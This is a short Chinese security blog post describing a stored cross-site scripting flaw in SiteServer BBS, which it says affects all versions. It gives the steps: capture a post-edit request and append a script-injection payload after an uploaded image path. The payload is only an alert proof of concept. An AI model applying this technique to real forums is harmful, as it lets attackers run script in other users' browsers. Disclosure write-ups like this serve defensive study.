SiteServer BBS 通杀储存型跨站 – 网站安全 – 自学p

时间: 2020-10-10|tag: 26次围观|0 条评论

通杀所有版本   先随便发布或回复一个帖子 内容要上传一张图片 发布成功后 编辑内容 并抓包 下面是抓包的内容 得到图片路径 forumID=14&threadID=271&postID=373&postType=&fileCount=0&title=Re%3A%E6%B5%8B%E8%AF%95%E5%B8%96&content=111111111112222222222%3Cimg+src%3D%22%2FBBS%2Fupload%2F2013%2F12%2Ft_27164555796.jpg 修改数据包 在图片地址后面加入攻击代码   forumID=14&threadID=271&postID=373&postType=&fileCount=0&title=Re%3A%E6%B5%8B%E8%AF%95%E5%B8%96&content=111111111112222222222%3Cimg+src%3D%22%2FBBS%2Fupload%2F2013%2F12%2Ft_27164555796.jpg"></textarea><script>alert(/xss/)</script> 再次提交   用户访问帖子时即可触发~

SiteServer BBS 通杀储存型跨站 – 网站安全 – 自学p插图 SiteServer BBS 通杀储存型跨站 – 网站安全 – 自学p插图1
SiteServer BBS 通杀储存型跨站 – 网站安全 – 自学p插图2

    上一篇: 天天团购可查看任意用户信息(订单号可算出) -

    下一篇: CSRF简单介绍及利用方法 - 网站安全 - 自学php
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《SiteServer BBS 通杀储存型跨站 – 网站安全 – 自学p
   

还没有人抢沙发呢~